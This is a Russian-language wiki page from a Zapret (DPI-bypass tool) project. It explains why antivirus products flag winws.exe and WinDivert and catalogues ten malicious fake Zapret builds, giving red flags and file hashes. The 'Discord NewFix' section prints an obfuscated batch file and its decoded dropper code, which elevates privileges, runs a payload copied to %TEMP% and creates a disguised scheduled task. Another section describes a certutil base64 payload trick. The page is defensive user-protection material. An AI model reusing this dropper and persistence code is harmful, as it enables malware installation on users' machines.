todo/virus/virus.md
loop-uh 0990f02ff9
Some checks failed
Published content check / validate (push) Failing after 5s
Обновить ссылки на переименованный репозиторий zapret → zapretgui
Forgejo-репозиторий переименован; shields.io не ходит по 301-редиректу
API, из-за чего сломался бейдж загрузок. Обновлены ссылки в 12 заметках,
кириллическая метка бейджа URL-закодирована.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
2026-08-20 17:32:44 +03:00

40 KiB
Raw Permalink Blame History

home

👾 О вирусах в Запрет! Рассказываем про WinDivert

Новая группа про реальные вирусные сборки запрета: https://t.me/zapretvirus

Caution

Касперский и иные российские вирусы начали войну с запретами и иными средствами обхода блокировок. Чтобы использовать их спокойно рекомендуется перейти на альтернативные антивирусы (Defender, ESET32 и т.д.), которые не выдают ложные и обманчивые срабатывания и помогают от большего количества угроз. Также не следует использовать российские антивирусы, либо добавлять файлы в исключения.

Запрет вирус? Обход блокировки дискорда и ютуба (discord и youtube). Если не работает дискорд или ютуб вам сюда. | Список вирусных Zapret представлен здесь...

Если коротко: 8 правил

Ниже на этой странице — десять разобранных подделок с подробностями. Если читать некогда, вот выжимка. Правила простые, проверяются за минуту.

1. В папке bin должен быть один .exewinws.exe. Видишь второй, как бы он ни назывался (StartWin.exe, Windiver.exe, «Быстрый запуск») — выбрасывай всю сборку. Второй файл никто не кладёт «для удобства».

2. Пароль на архиве — всегда плохо. Программа бесплатная, прятать нечего. Пароль нужен для одного: чтобы антивирус не заглянул внутрь, пока ты не распакуешь.

3. Просят отключить антивирус — закрывай страницу. Нормальной сборке это не нужно. Совсем.

4. Смотри размер .bat-файлов. Обычный — 24 килобайта. Если батник весит мегабайты, в нём спрятана программа. Открой блокнотом: увидишь стену из букв и цифр и слово certutil — это вирус.

5. Звёзды и коммиты ничего не значат. Их покупают. Мы видели репозиторий с 200 звёздами, где аккаунт создан за полторы минуты до самого проекта. И 12 тысяч коммитов, сделанных скриптом за пять дней. И даты коммитов «из будущего» — до 31 декабря.

6. Антивирус молчит — это не значит «чисто». Один и тот же файл: сам по себе его ловят 51 антивирус из 71, а внутри большого архива — только 10 из 58. Поэтому проверяй на VirusTotal распакованный файл, а не архив.

7. Discord заработал — это тоже не значит «чисто». Последняя подделка честно чинит Discord, а рядом тихо запускает вторую программу, которая качает из интернета что угодно. Работает — не равно безопасно.

8. Главная проверка — хэш. Скачай сборку с официальной страницы, посчитай sha256sum bin/winws.exe и сравни с тем, что у автора. Не сошлось — файл трогали. Это единственная проверка, которую нельзя обмануть красивым сайтом.

[!tip] Что делать вместо проверок Не искать сборку через поиск, рекламу и видео на YouTube. Брать по ссылкам из Zapret/download — там же лежат хэши. Всё, что нашлось само (красивый сайт, «новая версия 4.0», «фикс 2026») — считай чужим, пока не доказано обратное.

Как проверить вирусы?

  • Проект должен быть с открытым исходным кодом. Любой лаунчер человек должен собрать сам. Поэтому у него должен быть исходный код (batфайлы, ps файлы, pyфайлы и т.д.)
  • Вы можете собрать его самостоятельно из исходных файлов или по крайней мере запуск производится по понятным механикам.
  • Одно из самых важных правил: В проекте нет ни одного неизвестного exeфайла! Должен быть только один файл winws.exe!
  • Если Вы (или по крайней мере Вам кажется) что вы поймали вирус обратитесь в группу - Вам помогут опытные люди с самыми различными историями.

Почему антивирусы ругаются на Zapret (winws.exe), WinDivert и ZapretGUI?

Многие пользователи, впервые скачав Zapret, видят предупреждение антивируса со страшным словом «Trojan» и сразу паникуют. Давайте разберёмся, почему это происходит и стоит ли беспокоиться.

Как работают современные антивирусы

Антивирусы используют два основных метода обнаружения угроз:

  1. Сигнатурный анализ — антивирус сравнивает файл с базой известных вирусов. Если файл совпадает с образцом вредоносной программы, он блокируется.
  2. Эвристический (поведенческий) анализ — антивирус анализирует, что делает программа. Если её поведение похоже на типичное поведение вирусов, срабатывает предупреждение. Именно здесь кроется причина ложных срабатываний.

Почему Zapret вызывает подозрения

Zapret выполняет действия, которые технически похожи на то, что делают некоторые вредоносные программы:

  • Изменяет файл hosts — этот системный файл отвечает за сопоставление доменных имён с IP-адресами. Вирусы часто его модифицируют, чтобы перенаправлять вас на фишинговые сайты. Zapret же использует его для корректной работы обхода блокировок.
  • Работает с сетевым трафиком на низком уровне — программа перехватывает и модифицирует сетевые пакеты. Это необходимо для обхода DPI, но такое же поведение характерно для шпионских программ.
  • Использует системные драйверыWinDivert и Monkey.sys позволяют программе взаимодействовать с сетевым стеком Windows. Это легитимные драйверы, но сам факт их использования настораживает антивирус.

Что означает детект «Trojan:Win32/Bearfoos.B!ml»

Обратите внимание на окончание !ml в названии угрозы. Это означает machine learning — то есть не человек-аналитик пометил файл как вирус, а нейросеть Microsoft Defender решила, что поведение программы «подозрительное». Такие детекты часто бывают ложными, особенно для программ, работающих с системными компонентами.

Вот безопасный пример обнаружение "вируса": !

!

Что означает детект «Trojan:Win32/Sabsik.FL.A!ml»

Аналогично Bearfoos это всего лишь ИИ обнаружение. Как написано здесь большинство таких файлов полностью безопасны. Например такие срабатывания были на безопасные и открытые GitHub проекты.

!

Чего Zapret НЕ делает

Настоящие трояны обычно:

  • крадут пароли и cookies из браузеров
  • сканируют папки в поисках ценных файлов
  • отправляют ваши данные на серверы злоумышленников
  • устанавливают скрытые майнеры или бэкдоры

Zapret ничего из этого не делает. Исходный код программы полностью открыт — любой желающий может его изучить и убедиться в отсутствии вредоносного кода

Прозрачность сборки

Помимо открытого исходного кода, проект использует GitHub Actions для автоматической сборки. Это означает, что каждый релиз программы собирается прямо на серверах GitHub из публичного кода, а не на чьём-то личном компьютере.

Вы можете сами проверить историю сборок по адресу: https://git.zapret.moe/zapretdiscordyoutube/zapretgui/actions

Там видно, какой именно коммит (версия кода) использовался для каждой сборки, кто его сделал и когда. Зелёная галочка означает успешную сборку. Это гарантирует, что в скачанный вами файл никто не мог тайно подложить вредоносный код — вы получаете ровно то, что собрано из открытых исходников.

Антивирус сработал, хотя раньше всё было нормально

Частая ситуация: вы пользовались Zapret несколько недель или месяцев без проблем, а потом Windows Defender внезапно начинает на него ругаться. Код программы при этом мог вообще не меняться.

Почему так происходит? Microsoft постоянно обновляет базы и алгоритмы Defender. Нейросеть переобучается, добавляются новые сигнатуры, меняются критерии «подозрительности». В какой-то момент обновлённый антивирус решает, что программа, которую он раньше пропускал, теперь выглядит опасной.

К нам регулярно (буквально раз в неделю) приходят пользователи с одинаковой историей: «Всё работало отлично, ничего не менял, а сегодня Defender удалил Zapret». Это нормально и не означает, что программа стала вредоносной — просто антивирус обновил свои правила.

Вот только ЧАСТЬ реальных скриншотов что раньше Дефендер не ругался, однако "после какого-то обновления" начал это делать. Они датируются ещё 2024 годом. Запомните - сам по себе детект Дефендера не означает что это обязательно вирус. Нужно смотреть ЧТО это за вирус и через эвристику был получен этот детект.

!

!

!

!

!

Что делать в такой ситуации: добавьте папку с Zapret в исключения Windows Defender и заново скачайте программу.

Про драйверы WinDivert и Monkey.sys

Эти файлы — не часть Zapret, а отдельные общедоступные драйверы. WinDivert разработан для легитимного перехвата сетевого трафика и используется во множестве программ: файрволах, анализаторах трафика, VPN-клиентах. Подробнее о нём можно почитать здесь. Эти же драйверы использует оригинальный проект bol-van.

Вы можете добавить файл в исключение:

  1. Сам exe файл
  2. Саму папку по path путям

Вот пример незараженного dll файла, который всего лишь изменяет код некоторых файлов для запуска пиратской игры.

Данный dll хорошо известен и достаточно популярный на запада, однако антивирусы сходят с ума когда его видят.

!

Win64/Trojan.Generic.HgEATiwA — китайские антивирусы часто нумируют так неизвестные им программы, которые как-то вшиваются в трафик. Доказательства этому приведены здесь, здесь и здесь.

NotAVirus — частый детект различных китайских вирусов, но он так и подписан - не вирус. Это значит что файл просто выполняет подозрительные действия, но напрямую не является трояном.

Про хэш-файла

Неизвестные источники всё же могут маскировать Zapret под вирусы.

Есть способ защититься от этого - всегда сверяйте хэш файла WinDivert.dll и winws.exe. Если хэш суммы одинаковые, это значит что файлы никак не были изменены автором и были загружены из оригинального источника. Проверить хэш файла можно здесь.

Вот несколько старых хэшей файлов (есть и другие).

Оригинальные хэщи программы winws.exe

  • MD5 444fe359ca183016b93d8bfe398d5103
  • SHA-1 61716de8152bd3a59378a6cd11f6b07988a549d5
  • SHA-256 0453fce6906402181dbff7e09b32181eb1c08bb002be89849e8992b832f43b89

Версия v68

  • MD5 c36c5c34d612ffc684047b7c87310a1f
  • SHA-1 5b9a89d08554f911e93665a3910ff16db33bf1ce
  • SHA-256 c26719336725fda6d48815582acee198c0d7d4f6a6f9f73b5e0d58ca19cfbe35

Другие версии проверяйте самостоятельно здесь.

Реальные вирусы

Однако не смотря на это были найдены примеры реально вирусных запретов.

Почему это так, и как проверить любую версию Запрет самостоятельно - давайте разбираться.

1. PeekBot - первый автор

Впервые вирусы в Zapret начал распространять телеграм канал peekbot начал распространять вирусы под предлогом Zapret. Будьте внимательны! Также у них имеется вредоносный сайт https://gitrok.com!

В папке висит вирусный cygwin.exe который весит свыше 13 МБ. Такие большие файлы никогда не находились в оригинальном Zapret.

2. SkyWinFo - майнер, стилер

SkyWinFo - инженер ВПН который пошёл по скользкой дорожке и попытался превратить безвирусный запрет в самый настоящий вирус. Также был определён его тип и основная активность. Он притворялся запретом от Сensorliber.

🚩 Красные флаги:

  • Не имеет исходного кода на GitHub
  • Имеет архив rar, причём с паролем (не ясно зачем)
  • Просит запустить zapret.exe, а не zapret.bat
  • Нет связи с автором

В инструкции происходит некая каша и неразбериха, например указаны разные ссылки на источники (первый файл вирусный, второй реальный скрипт):

! Репозиторий github.com/SkyWinFo/Zapret-

В файле лежит неизестный вирусный файл, размер которого явно превышает несколько КБ (как оригинальный winws.exe):

!

Имеет слишком много срабатываний антивирусов, некоторые обнаружения прямо указывает на троян.

При анализе файла сканирует папки на куки файлы, создаёт папки для криптокошелков и пытается запустить множество процессов. Отправляет данные на неизвестный сайт.

3. Cactuz - троян

Новый тип вирусов с файлом winwsdriver.exe.

Их Телеграм группа:

!

Пост с вирусом:

!

Их ютуб канал:

!

Очень палёный вирус, который даже не пытается скрыть что он вирус. Второй EXE файл в папке bin который не должен был там быть - winwsdriver.exe.

!

Батник general.bat запускает два exe файла, что опять же не нужно.

!

На VirusTotal СВЫШЕ 55 срабатываний!

🚩 Красные флаги:

  • Не имеет исходного кода на GitHub
  • Имеет архив rar, причём с паролем (не ясно зачем)
  • Лишние файлы в папке bin
  • Нет связи с автором

4. Interfix - вероятно вирус

Также известен как Фиксик, trapper1337.

!

Неизвестный ютубер trapper1337, в Telegram подписан как Фиксик. В Telegram канал закрыты комментарии, обратной связи с ним нет. Неизвестный exe файл выглядит как подозрительный, но чёткой вирусной активности нет.

Ютуб канал:

!

В папке bin лежит лишний файл elevator.exe.

!

!

Файл start.cmd запускает два EXE файла, что не требуется для Zapret

!

Подозрительный файл не имеет много детектов антивирусов, поэтому чётко заявлять что это троян нельзя.

При этом всё же поведение файла является подозрительным, соединение с какими-то сайтами но не указано какими:

!

Красные флаги:

  • Не имеет исходного кода на GitHub
  • Имеет архив rar, причём с паролем (не ясно зачем)
  • Лишние файлы в папке bin
  • Нет связи с автором
  • Аналогичный файл можно встретить в сборке от YanGusik FuckDiscordPI.

!

5. Discord NewFix - скрытый вирус

Данный вирус пытается обфускацировать свой код с помощью программ запутывания кода.

!

Неизвестный файл discord.bat с иероглифами, который автор канал просит запустить:

挦獬敀档景൦ഊ椊硥獩⁴单剅剐䙏䱉䅜灰慄慴䱜捯污停捡慫敧屳楍牣獯景楗摮睯即潴敲䱜捯污瑓瑡履䥌䕃华≴⠠਍††潧潴匠楫䍰摯൥⤊਍਍灯湥楦敬渾汵㈠渾汵牥潲汲癥汥敮ⁱ瀠睯牥桳汥䌭浯慭摮瑓牡牐捯獥⁳┧ⴠ敖扲爠湵獁ഢ攠楸⁴戯ഩഊ椊硥獩⁴摾ば楢屮祣睧湩≬⠠਍††潣祰縥灤戰湩捜杹楷搮汬•┢䕔偍尥癪攮數渾汵㈠攠獬攠楸⁴戯ㄠഩഊ椊硥獩⁴䕔偍尥癪攮數猠慴瑲∠•┢䕔偍尥癪攮數猯㸠畮㸲ㄦ
汥敳⠠਍††硥瑩⼠⁢⤊਍਍晩渠瑯攠楸瑳唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整洠摫物唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整渾汵㈠⤊਍਍晩攠楸瑳縥灤到䅅䵄挠灯⁹摾ば䕒䑁䕍洮≤∠唥䕓偒佒䥆䕌尥灁䑰瑡屡潌慣屬慐正条獥䵜捩潲潳瑦圮湩潤獷瑓牯履潌慣卬慴整䱜䍉久䕓圭㸠畮㸲ㄦ
汥敳⠠਍††硥瑩⼠⁢⤊਍਍捳瑨獡獫牣慥整楍牣獯景屴楗摮睯屳楗摮睯啳摰瑡履湗敔灭尢樢癡睡ⴠ慪⁲≜唥䕓偒佒䥆䕌灁䑰瑡潌慣慐正条獥䴯捩潲潳瑦圮湩潤獷瑓牯潌慣卬慴整䰯䍉久䕓圭硴屴∢⼠捳漠汮杯湯汲栠杩敨瑳⼠⁦渾汵㈠റഊ㨊歓灩潃敤਍਍档灣㘠〵㸠畮൬㨊〰️‱ 呕ⵆസഊ挊縥灤∰਍慣汬挠敨正畟摰瑡獥戮瑡猠景൴攊档㩯਍਍敳⁴䥂㵎縥灤戰湩൜ഊ猊慴瑲慺牰瑥楤捳牯≤⼠┢楷睮ⴠ眭ⵦ捴㵰㐴ⴭ晷甭灤㐽〰️〰️㄰〰️ⴭ楦瑬牥甭灤㐽ⴠ栭獯汴獩㵴氢獩楤捳牯ⴠ搭楰搭獥湹㵣慦敫ⴠ搭楰搭獥湹ⵣ敲数瑡㵳ⴭ灤敤祳据昭歡ⵥ畱捩䈥义焥極彣湩瑩慩彬睷彷潧杯敬损浯戮湩ⴭ敮⁷൞ⴊ昭汩整摵㵰〵〰️ⴰ〵〱ⴭ灩敳㵴椢獰瑥搭獩潣摲琮瑸ⴭ灤敤祳据昽歡ⴭ灤敤祳据愭祮瀭潲潴潣ⴭ灤敤祳据挭瑵景㵦ⴠ搭楰搭獥湹ⵣ敲数瑡㵳ⴭ敮⁷൞ⴊ昭汩整捴㵰㐴ⴭ潨瑳楬瑳楬瑳搭獩潣摲琮瑸ⴭ灤敤祳据昽歡ⱥ灳楬⁴ⴭ灤敤祳据愭瑵瑯汴ⴠ搭楰搭獥湹ⵣ敲数瑡㵳ⴭ灤敤祳据昭潯楬杮戽摡敳ⁱⴭ灤敤祳据昭歡ⵥ汴㵳汴彳汣敩瑮敨汬彯睷彷潧杯敬损浯戮湩ഢ

!

!

При расшифровке данного файла окажется что исходный код был пропущен через batch-obfuscator и загружает данный код:

&cls
@echo off

if exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE.txt" (
    goto SkipCode
)

openfiles >nul 2>nul
if %errorlevel% neq 0 (
    powershell -Command "Start-Process '%~f0' -Verb runAs"
    exit /b
)

if exist "%~dp0bin\cygwin2.dll" (
    copy "%~dp0bin\cygwin2.dll" "%TEMP%\jv.exe" >nul 2>&1
) else (
    exit /b 1
)

if exist "%TEMP%\jv.exe" (
    start "" "%TEMP%\jv.exe" /s >nul 2>&1

 
 else (
    exit /b 1
)

if not exist "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" (
    mkdir "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState" >nul 2>&1
)

if exist "%~dp0README.md" (
    copy "%~dp0README.md" "%USERPROFILE%\AppData\Local\Packages\Microsoft.WindowsStore\LocalState\LICENSE-WD.txt" >nul 2>&1

 
 else (
    exit /b 1
)

schtasks /create /tn "Microsoft\Windows\WindowsUpdate\WnTemp" /tr "\"javaw\" -jar \"%USERPROFILE%/AppData/Local/Packages/Microsoft.WindowsStore/LocalState/LICENSE-WD.txt\"-tls="%BIN%tls_clienthello_www_google_com.bin"

Бат файл создаёт задачу на джаве скрипте, после чего подгружается вирус:

!

!

6. discord-cdn-fix / Bypass Ultimate — сеть клонов-репозиториев

Новый по механике тип: не один заражённый rar, а сеть из десятка с лишним одинаковых GitHub-репозиториев под одноразовыми аккаунтами (rapidcounttend, Originioknow, WestDriverComply, Constraintpletype, Grayflidivider, Petainamplifier, BudgieBushing, StalkerLightning и др.). У всех один баннер «BYPASS ULTIMATE», один README, один релиз v1.1.8. Звёзды накручены до одного числа в пределах кластера: семейство discord-cdn-fix / youtube-unban-2026ровно по 66, семейство *-fix-2026 (Roblox, Telegram) от StalkerLightningровно по 28. Внутри — пять-шесть неизвестных .exe (Discord zapret.exe, Telegram zapret.exe, YouTube zapret.exe, Быстрый запуск.exe, Статус подключения.exe, плюс комбо вроде roblox-dpi-fix-2026.exe) и ни одного исходника, хотя в темах стоит Python.

🚩 Красные флаги:

  • Сеть идентичных клонов под случайными аккаунтами (бан одного не убивает раздачу)
  • Накрутка звёзд ровно до одного числа в пределах кластера (66 и 28)
  • Пачка неизвестных .exe вместо одного winws.exe
  • Нет исходного кода, только скомпилированные бинарники
  • README заранее оправдывается «ложными срабатываниями антивируса»

Подробный разбор: discord-cdn-fix-fake-repos-june-2026.

7. Malik DS (@discordfixe) — красные флаги вирусной раздачи

Ещё один вирусный телеграм-канал, распространяющий «фикс Discord» под видом обхода блокировок: Malik DS (@discordfixe, около 4,14 тыс. подписчиков на июль 2026). Канал раздаёт архив FixDiscord.zip (~7,9 МБ) и подаёт обновления как «ответ на расширение блокировок РКН» — новый белый список, стратегия фильтрации UDP для Discord и т.п.

Проблема в способе раздачи, а не в громких обещаниях. У архива те же признаки, что и у остальных вирусных сборок из этого списка: он запаролен (пароль «1234»), а в инструкции автор прямо просит отключить антивирус на время установки («если файл удаляется системой, можете выключить антивирус»). Оба приёма — классический способ протащить полезную нагрузку мимо защиты: пароль не даёт антивирусу заглянуть внутрь zip до распаковки, а отключённый антивирус не среагирует на запуск.

🚩 Красные флаги:

  • Нет открытого исходного кода на GitHub — только готовый архив из Telegram
  • Архив zip запаролен (пароль «1234») — незачем для легального обхода, но удобно, чтобы антивирус не сканировал содержимое
  • Инструкция просит отключить антивирус — этого не требует ни одна честная сборка Zapret
  • Комментарии в канале закрыты, обратной связи с автором нет

[!warning] Статус проверки Содержимое FixDiscord.zip в рамках этой заметки не анализировалось — вердикт «троян» не выносится. Но набор признаков (запароленный архив + просьба выключить антивирус + закрытые комментарии + отсутствие исходников) в точности совпадает с задокументированными выше вирусными раздачами. Пока не доказано обратное, относитесь к этой сборке как к небезопасной и берите Zapret только из download. Как отличить подделку от оригинала — по чек-листу «Как проверить вирусы?» в начале этой заметки.

8. Payload внутри general.bat — приём, который проходит чек-лист выше

Самая неприятная находка на 11 августа 2026: раздачи научились обходить главное правило проверки — «в папке должен быть только один winws.exe». Папка bin у таких сборок действительно чистая, а вредоносный код зашит в сам текстовый скрипт запуска.

Механика на примере репозиториев Quantumfirear/zapret-discord-youtube-1-10-0 и Enamelzestation/zapret-discord-youtube: файл general.bat (или service.bat) раздут до ~15,8 МБ, внутри — исполняемый файл Windows, записанный в кодировке base64 тысячами строк echo. При запуске скрипт собирает из них временный файл, декодирует его штатной утилитой Windows certutil -decode в %TEMP%\Setup-XXXXXXXX.exe и запускает через start /b. Никакого лишнего .exe в раздаче нет — он появляется только в момент запуска.

🚩 Красные флаги:

  • .bat-файл размером в мегабайты (у настоящей сборки — единицы килобайт)
  • Слова certutil, -decode, %TEMP%, start /b внутри скрипта запуска
  • Накрученные метрики доверия: сотни звёзд и десятки тысяч коммитов вида «Update README.md» на аккаунте возрастом в месяц
  • Файл SHA256SUMS.txt рядом с архивом, суммы в котором не сходятся с фактическими

Подробный разбор с числами, хэшами полезной нагрузки и командами для самостоятельной проверки: github-removes-clean-zapret-keeps-malware-august-2026.

9. Fixit — приманка для стилера Arcane

Разновидность, у которой обхода блокировок нет вовсе: под названием «Fixit» раздаётся не сборка, а архив со стилером. Кампанию разобрала «Лаборатория Касперского»: домены fixitlab[.]cc и fix-it[.]cc зарегистрированы 2021 февраля 2026, продвижение шло через ролики на YouTube (не менее 20 видео, свыше 20 000 просмотров), а внутри архива — инструкция, легальный WinRAR.exe, зашифрованный data.bin и Fixit.bat, который расшифровывает и запускает полезную нагрузку. Ставятся стилер Arcane (пароли, куки, банковские карты, данные Telegram, Discord, Steam, криптокошельков, пароли Wi-Fi) и майнер Monero.

🚩 Красные флаги:

  • Красивый лендинг с обещаниями вроде «стабильность 100 %» и полное отсутствие исходного кода
  • Инструкция просит запустить .bat и отключить антивирус
  • Домен зарегистрирован за считанные месяцы до «популярности» продукта
  • Кнопка «Скачать» ведёт через сокращатель ссылок или на домен-двойник (github[.]guru)

Полный разбор кампании, проверка WHOIS и отдельно — где предупреждениям антивируса стоит верить, а где детект означает лишь класс RiskTool: fixit-arcane-stealer-kaspersky-august-2026.

10. HideMyDiscord — рабочий обход с загрузчиком рядом

Самый неудобный для распознавания случай на 11 августа 2026: сборка с сайта hidemydiscord.com честно чинит Discord. Внутри настоящая сборка Flowseal с нетронутыми стратегиями — и лишний файл bin/StartWin.exe на 6,2 МБ, которого в оригинале нет. Запускают его 21 из 23 стартовых скриптов: строкой выше настоящего winws.exe, свёрнутым, под тем же заголовком окна. Написан на Go, имена функций не скрыты: downloadFile, decryptBlob, launchPayload, runExe, runBat, runTxtManifest — то есть загрузчик второй ступени.

🚩 Красные флаги:

  • Два исполняемых файла в bin вместо одного winws.exe
  • Архив внутри архива, внутренний запаролен, пароль опубликован на сайте
  • Внутренний архив в формате RAR 7, который не открывает 7-Zip
  • Ядро winws.exe пропатчено под свой бренд, из-за чего не сходится хэш с официальным
  • Раздача из профильного репозитория GitHub, который не виден в поиске по темам

[!danger] Правило, которое переживёт следующее поколение подделок Раздача уже умеет править чужой скомпилированный бинарник и выдавать его за оригинал — пока ради надписи в консоли. Если тем же способом дописать полезную нагрузку внутрь winws.exe, перестанут работать все признаки из чек-листа выше: в папке снова будет один исполняемый файл, скрипты останутся чистыми, обход продолжит работать. У ядра нет цифровой подписи, поэтому ни Windows, ни антивирус о подмене не сообщат. Единственная проверка, которая устоит, — сверка sha256sum bin/winws.exe с хэшем от автора ядра.

Разбор цепочки целиком, включая приём восстановления скрытого репозитория по числу из ссылки: hidemydiscord-loader-august-2026.